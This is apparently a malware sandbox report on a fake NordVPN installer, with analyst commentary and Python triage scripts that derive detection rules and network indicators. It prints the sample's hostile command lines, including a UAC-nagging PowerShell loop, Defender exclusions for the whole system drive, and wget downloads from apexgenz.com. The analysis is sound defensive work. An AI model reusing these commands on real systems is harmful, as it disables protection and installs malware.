C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1140
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5940 -ip 5940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1176
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\NordVPN-10_11\" -spe -an -ai#7zMap8338:88:7zEvent13711
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 1140
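Reading the list above as a chain: 7zG.exe unpacks NordVPN-10_11.zip; Downloads\NordVPN-10_11\Launcher.exe executes a copy from AppData\Roaming\services\Launhcer.exe (note the transposed letters); a PowerShell loop relaunches data\Launcher.exe with -Verb RunAs until the UAC prompt is accepted; a second PowerShell call adds Defender exclusions for ProgramData, AppData and the whole system drive; a bundled wget.exe fetches three files from apexgenz.com, each unpacked by a bundled winrar.exe with the password jryj2023 into extension-less plugin* files; plugin16904 (PID 3700, which WerFault later reports crashing) then creates a process with sihost.exe as its recorded parent, the NtCreateUserProcessOtherParentProcess row above, and dialer.exe, listed right after it, is the likely child. The SysWOW64 image paths for powershell.exe, dialer.exe and WerFault.exe, while the command lines name System32, are file-system redirection for a 32-bit parent. The Python below is an added example, not vendor or sample code: it turns those observations into triage rules and runs them over process-creation records reconstructed from the list. Command lines are abridged, every PID except 3700 is invented, and the ppid, parent_image and creator_pid fields are constructed to model the signature row.

```python
"""Triage rules over process-creation records reconstructed from the report."""
import re

# Constructed sample input, abridged from the report's Processes list. PIDs other
# than 3700 (plugin16904) and the ppid/parent_image/creator_pid fields are invented.
EVENTS = [
    {"pid": 1001, "image": r"C:\Program Files\7-Zip\7zG.exe",
     "cmdline": r'''"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\NordVPN-10_11\" -spe -an'''},
    {"pid": 1002, "image": r"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe",
     "cmdline": r'''"C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe"'''},
    {"pid": 1003, "image": r"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe",
     "cmdline": r'''"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"'''},
    {"pid": 1004, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "function Get-Win { while ($true) { try { Start-Process -FilePath .\data\Launcher.exe -Verb RunAs -Wait; break } catch {} } } Get-Win"'''},
    {"pid": 1005, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "'''},
    {"pid": 1006, "image": r"C:\Users\Admin\AppData\Roaming\services\wget.exe",
     "cmdline": r'''"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services'''},
    {"pid": 1007, "image": r"C:\Users\Admin\AppData\Roaming\services\winrar.exe",
     "cmdline": r'''"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services'''},
    {"pid": 3700, "image": r"C:\Users\Admin\AppData\Roaming\services\plugin16904",
     "cmdline": r"C:\Users\Admin\AppData\Roaming\services\plugin16904"},
    {"pid": 1009, "image": r"C:\Windows\SysWOW64\dialer.exe",
     "cmdline": r'''"C:\Windows\system32\dialer.exe"''',
     "ppid": 900, "parent_image": r"C:\Windows\system32\sihost.exe", "creator_pid": 3700},
]


def rule_defender_exclusion(ev):
    """Add-MpPreference -ExclusionPath; flags exclusions that cover a whole drive."""
    m = re.search(r'Add-MpPreference\b[^"]*-ExclusionPath\s+([^"]+)', ev["cmdline"], re.I)
    if not m:
        return None
    paths = [p.strip() for p in m.group(1).split(",") if p.strip()]
    whole_drive = any(p.lower().endswith(("systemdrive\\", ":\\")) for p in paths)
    return "exclusions: " + ", ".join(paths) + (" (covers the whole system drive)" if whole_drive else "")


def rule_ps_bypass(ev):
    """-ExecutionPolicy Bypass, plus the RunAs-until-accepted loop when present."""
    c = ev["cmdline"]
    if not re.search(r"-ExecutionPolicy\s+Bypass", c, re.I):
        return None
    detail = "ExecutionPolicy Bypass"
    if re.search(r"while\s*\(\s*\$true\s*\)", c) and re.search(r"-Verb\s+RunAs", c, re.I):
        detail += "; loops Start-Process -Verb RunAs until the UAC prompt is accepted"
    return detail


def rule_exec_from_user_profile(ev):
    """Any image (with or without an extension) running out of AppData."""
    if re.search(r"\\AppData\\(Roaming|Local)\\", ev["image"], re.I):
        return "image executes from " + ev["image"]


def rule_wget_http(ev):
    """A bundled wget.exe fetching a URL."""
    if ev["image"].lower().endswith("\\wget.exe"):
        m = re.search(r"https?://\S+", ev["cmdline"])
        if m:
            return "downloads " + m.group(0)


def rule_rar_password(ev):
    """A bundled winrar.exe extracting with an inline -p<password>."""
    if ev["image"].lower().endswith("\\winrar.exe"):
        m = re.search(r"(?:^|\s)-p(\S+)", ev["cmdline"])
        if m:
            return "extracts a password-protected archive (password " + m.group(1) + ")"


def rule_ppid_spoof(ev):
    """Creator PID (from the kernel) differs from the parent the child reports."""
    creator = ev.get("creator_pid")
    if creator is not None and creator != ev.get("ppid"):
        return (f"parent recorded as pid {ev.get('ppid')} ({ev.get('parent_image')}) "
                f"but created by pid {creator}")


def rule_dialer_no_args(ev):
    """dialer.exe has no headless use; an argument-less start is an injection-host candidate."""
    if ev["image"].lower().endswith("\\dialer.exe") and ev["cmdline"].strip().strip('"').lower().endswith("dialer.exe"):
        return "dialer.exe started with no arguments"


RULES = [rule_defender_exclusion, rule_ps_bypass, rule_exec_from_user_profile,
         rule_wget_http, rule_rar_password, rule_ppid_spoof, rule_dialer_no_args]


def triage(events):
    """Return (rule, pid, detail) triples for every rule that fires on every event."""
    hits = []
    for ev in events:
        for rule in RULES:
            detail = rule(ev)
            if detail:
                hits.append((rule.__name__[len("rule_"):], ev["pid"], detail))
    return hits


if __name__ == "__main__":
    for rule, pid, detail in triage(EVENTS):
        print(f"{pid:>5}  {rule:<24} {detail}")
```

The creator-versus-parent comparison needs a telemetry source that records who actually called the process-creation API (kernel callbacks or an EDR sensor); plain Sysmon Event ID 1 only carries the parent the child reports, which is exactly the field parent spoofing forges.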
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| N/A | 127.0.0.1:51483 | N/A | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 52.25.97.240:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | 240.97.25.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:51489 | N/A | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| DE | 142.250.186.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| DE | 142.250.186.68:443 | www.google.com | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | 68.186.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 67.185.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.184.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vpngets.com | udp |
| US | 172.67.131.227:80 | vpngets.com | tcp |
| US | 172.67.131.227:80 | vpngets.com | tcp |
| US | 8.8.8.8:53 | vpngets.com | udp |
| US | 8.8.8.8:53 | vpngets.com | udp |
| US | 172.67.131.227:443 | vpngets.com | tcp |
| US | 172.67.131.227:443 | vpngets.com | udp |
| US | 8.8.8.8:53 | neo.tildacdn.com | udp |
| DE | 162.55.188.142:443 | neo.tildacdn.com | tcp |
| US | 8.8.8.8:53 | neo.tildacdn.com | udp |
| US | 8.8.8.8:53 | neo.tildacdn.com | udp |
| US | 8.8.8.8:53 | 227.131.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.185.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.188.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stat.tildacdn.com | udp |
| GB | 193.3.17.198:443 | stat.tildacdn.com | tcp |
| US | 8.8.8.8:53 | stat.tildacdn.com | udp |
| US | 8.8.8.8:53 | stat.tildacdn.com | udp |
| US | 8.8.8.8:53 | 198.17.3.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.28.226:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | s3-w.us-east-1.amazonaws.com | udp |
| US | 8.8.8.8:53 | s3-w.us-east-1.amazonaws.com | udp |
| US | 3.5.28.226:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 226.28.5.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s3-w.us-east-1.amazonaws.com | udp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.28.226:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | stat.tildacdn.com | udp |
| US | 8.8.8.8:53 | neo.tildacdn.com | udp |
| US | 8.8.8.8:53 | neo.tildacdn.com | udp |
| US | 8.8.8.8:53 | voloz.site | udp |
| US | 172.67.145.170:443 | voloz.site | tcp |
| US | 8.8.8.8:53 | voloz.site | udp |
| US | 8.8.8.8:53 | voloz.site | udp |
| US | 8.8.8.8:53 | 170.145.67.172.in-addr.arpa | udp |
| US | 172.67.145.170:443 | voloz.site | udp |
| US | 8.8.8.8:53 | vpnsget.pw | udp |
| US | 8.8.8.8:53 | vpnsget.pw | udp |
| US | 172.67.165.66:443 | vpnsget.pw | tcp |
| US | 8.8.8.8:53 | vpnsget.pw | udp |
| US | 8.8.8.8:53 | 66.165.67.172.in-addr.arpa | udp |
| US | 172.67.165.66:443 | vpnsget.pw | udp |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 199.29.14.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
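The table mixes three things: resolver queries to 8.8.8.8 and reverse lookups the sandbox itself issues, browser background traffic to Mozilla and Google services, and the sample's own connections. Read in order it shows the lure path first (vpngets.com, its assets on tildacdn.com, then bitbucket.org and bbuseruploads.s3.amazonaws.com, from which the browser download saved as NordVPN-10_11.g2vukrUZ.zip.part appears to have come), followed by traffic from the dropped components to voloz.site, vpnsget.pw, apexgenz.com (the wget target) and raw.githubusercontent.com. The 443/udp rows are QUIC attempts alongside the TLS connections. The Python below, added as an example and not part of the report, reduces a table like this one to one entry per domain, keeping every distinct peer and protocol, and handles the rows where the Domain cell is empty and the protocol slid into its column. The rows it carries are a subset copied from the table in the report's order; which suffixes count as background is this example's assumption and is stated in the code.

```python
"""Reduce a sandbox Network table to per-domain indicators."""
from collections import OrderedDict

# Rows copied from the report (a representative subset, in the report's order).
ROWS = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| N/A | 127.0.0.1:51483 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| DE | 142.250.186.68:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | vpngets.com | udp |
| US | 172.67.131.227:80 | vpngets.com | tcp |
| US | 172.67.131.227:443 | vpngets.com | udp |
| DE | 162.55.188.142:443 | neo.tildacdn.com | tcp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 3.5.28.226:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 172.67.145.170:443 | voloz.site | tcp |
| US | 172.67.165.66:443 | vpnsget.pw | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
"""

RESOLVER = "8.8.8.8:53"
PROTOS = {"tcp", "udp"}
# Assumption for this example: browser/OS background traffic seen in this sandbox.
NOISE_SUFFIXES = (".mozilla.com", ".mozilla.net", ".mozgcp.net", ".mozaws.net", ".google.com")


def parse_row(line):
    """Return (country, dest, domain, proto) or None for non-data lines. When the
    Domain cell is empty the protocol has slid left into it; put it back."""
    line = line.strip()
    if not line.startswith("|"):
        return None
    fields = [f.strip() for f in line.split("|")[1:-1]]
    if len(fields) != 4 or fields[0] == "Country":
        return None
    country, dest, domain, proto = fields
    if domain in PROTOS and proto == "":
        domain, proto = None, domain
    return country, dest, domain, proto


def is_background(dest, domain):
    ip = dest.rsplit(":", 1)[0]
    if domain is None or ip.startswith(("127.", "224.")):
        return True   # loopback / mDNS: nothing to pivot on
    if domain.endswith(".in-addr.arpa"):
        return True   # reverse lookups the sandbox triggers for every peer
    return domain.endswith(NOISE_SUFFIXES)


def reduce_network_table(text):
    """One entry per first-seen domain with its distinct ip:port/proto peers and
    the number of rows (DNS and connections) that mentioned it."""
    indicators = OrderedDict()
    background = 0
    for line in text.splitlines():
        row = parse_row(line)
        if row is None:
            continue
        _country, dest, domain, proto = row
        if is_background(dest, domain):
            background += 1
            continue
        entry = indicators.setdefault(domain, {"domain": domain, "rows": 0, "endpoints": set()})
        entry["rows"] += 1
        if dest != RESOLVER:          # a DNS row names the domain but not the peer
            entry["endpoints"].add(f"{dest}/{proto}")
    result = [dict(e, endpoints=sorted(e["endpoints"])) for e in indicators.values()]
    return result, background


if __name__ == "__main__":
    iocs, skipped = reduce_network_table(ROWS)
    print(f"{skipped} background rows skipped")
    for e in iocs:
        print(f"{e['domain']:<32} rows={e['rows']}  {' '.join(e['endpoints']) or '(DNS only)'}")
```

A domain that was resolved but never connected to (sinkholed or down during detonation) still comes out as an entry with no endpoints, which is worth keeping: it is evidence of intent even without a peer address.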
Files
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\pending_pings\ab8cdac4-8a8f-4c93-8d2f-7d03ffd575d4
| MD5 | fb403e3808249a0ef5d50d1108f9770b |
| SHA1 | 09c96d890347b6ab12dc250a2764baeef8e703f7 |
| SHA256 | f8673694373c1631e2612e2fc05ad0099fad9a49286f0c43a3344f1eb80a6c83 |
| SHA512 | d1ce8473cfa30edc0804ed30ae5b5eba24f8d13910f41cb7011ab3b502fee63253371921768b6561584292f4c91cd27d64bc95314f6a800f52e70afe6a34b307 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\pending_pings\efeb1311-ca69-4ea6-b522-9dc391810200
| MD5 | 23d75d5683d0d770da46ba9c7b518818 |
| SHA1 | 54102604312975c92706242ec9ef060947becfd9 |
| SHA256 | 2bf63a115c0e147279e6e32796bf6a24315a6305041c5ce888ac9a73301daef1 |
| SHA512 | 5a37df93a89144250edeb039721f60c0fe383479ae112c0dda2a430aaeac9ea0aed0fe6b5a34ae6efa83d956ce000ba5b861a81546ff9d1aa4dacc8bf42006fa |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\db\data.safe.bin
| MD5 | f05f543617b8face46542d646c55b6d1 |
| SHA1 | 31a0b7e87707eb1361ecb4bc6f0152a955c4b973 |
| SHA256 | ae11567b65bea21ccc814cfec8fcba1109207a4eff99d3fc84ff551c3749645d |
| SHA512 | 27aac929a3cd91baec3af5643b89e7903a75ef8044f91c29b471660b26d3e35fbafd2d7c4e3e8985a8a0262818943a23e4ce35bcd94cf1989d018d771ba3e1a0 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\prefs-1.js
| MD5 | 1008a57a9212174c182b3793c3fec936 |
| SHA1 | ef60d8b64148df6f11fb80f33f00352c4ec63489 |
| SHA256 | 7b3810d2df381c9ecc386e495e4d2dacf98edcffec141fefdf14ef9e1a330b64 |
| SHA512 | a2562c4d8b6e75193c109a128fa4c58f09bda8a93feacdcc782571067c5bf09164fb76b76ca76ee48ff79b5dd9fa43b4b97236bf8c78002d23358d1efb76c80a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 6909468c9f43c288423627fdd7cd5470 |
| SHA1 | 393d01e5cd85d4a622e2cda5c01aaceaa1edacf1 |
| SHA256 | f6c27baddbd79ef5c502740a766b79ab1a268807ca75f2f39f9fb2620d8efbe6 |
| SHA512 | 8aa7ba379e24c801c25b09152c70c42c877cb0c0fa6d7502fc34d8203729af37bfef488f3bbf407a24710eabd06b8811fae0381b1dc5a0cbde675b77a7605926 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 1639e98f6397aed6f1f6cf6a89c20748 |
| SHA1 | 1879bb1a689b482a9b8d1e0fc0c19d5f9416d702 |
| SHA256 | 584456e5d5de4ee42642463c4487b10309545ce2c75f14990c5437b1b2aabdd1 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-29 14:54
Reported
2024-03-29 14:58
Platform
win11-20240221-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |